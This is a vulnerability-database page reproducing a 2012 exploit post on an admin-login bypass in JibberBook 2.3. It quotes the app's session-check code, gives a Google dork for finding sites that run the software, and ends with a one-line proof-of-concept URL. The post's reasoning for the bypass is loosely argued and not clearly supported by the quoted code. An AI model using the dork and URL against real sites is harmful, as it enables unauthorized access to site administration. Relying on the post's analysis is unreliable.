Vulners
Lucene search
Jibberbook 2.3 Administrative Bypass
`#################################################
# Exploit Title : jibberbook Bypass Admin Vulnerability
#
# Author : IrIsT.Ir & Sec4Ever.com
#
# Discovered By : L3b-r1'z
#
# Home : http://IrIsT.Ir & http://Sec4Ever.com
#
# P Blob : http://L3b-r1z.com/
#
# Software Link : http://jibberbook.com/
#
# Security Risk : High
#
# Version : 2.3
#
# Tested on : win\XP
#
# Dork : allintext: "JibberBook created by chromasynthetic |
Powered by MooTools, HTML Purifier, and Akismet"
#
# 1) SCript
# 2) Info Vulnerabilty
# 3) P0c
#
#
#################################################
#
# 1) SCript:
# JibberBook allow the visitor to make comment or any thing like how
visitor like website :)
# or any msg for admin of site.
#
#
#################################################
#
# 2) Info Vulnerability :
# This exploit allow attacker to log into the admin panel with out write
username or password .
# Look Into The File index.php In jibberbook-2.3\admin :
#
# require_once('inc/secure.php');
# require_once('../inc/includes.php');
# includes(array('admin/actions/load.php',
'admin/actions/transformxml.php'));
#
# $_SESSION['referer'] = 'http://' . $_SERVER['HTTP_HOST'] .
$_SERVER['REQUEST_URI'];
# require_once('inc/header.php');
# ?>
# We have Require to File Named Secure , Lets Check it :) :
#
# session_start();
# if (!isset($_SESSION['admin']))
# {
# if (is_file(realpath('login_form.php'))) {
# $url = 'http://' . $_SERVER['HTTP_HOST'] .
dirname($_SERVER['REQUEST_URI'] . 'x') . '/login_form.php';
# } else {
# $url = 'http://' . $_SERVER['HTTP_HOST'] .
dirname(dirname($_SERVER['REQUEST_URI'] . 'x')) . '/login_form.php';
# }
# header("Location: $url");
# exit();
# } else {
# $loggedin = true;
# }
#
# The file don't have any secure here :P.
# Cz Look To Below Header , We Have else Loggedin = True, its mean if the
attacker not admin required to login_form.php
# else , Loggedin = true , Admin Redirect to Admin panel :).
#
#
#################################################
#
# 3) p0c :
#
# Site.Com/Admin/Login_form.php?loggedin=true
#
#################################################
#
#
# Special Thx To : Irist Team & Sec4Ever Team .
#
#################################################
#
#
# Greet'z : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The Injector,
N4ss1m, hacker-1420.
# Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The Viper, Th3
Killer Dz.
# Over-X <3, And All My Friends.
#
#################################################
--
Proud To Be Lebanese :D
I Will Miss You My Friends : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The
Injector, N4ss1m, Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The
Viper, Th3 Killer Dz, Over-X <3, And All My Friends.
Sec4ever.com.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 May 2012 00:00Current
0.2Low risk
Vulners AI Score0.2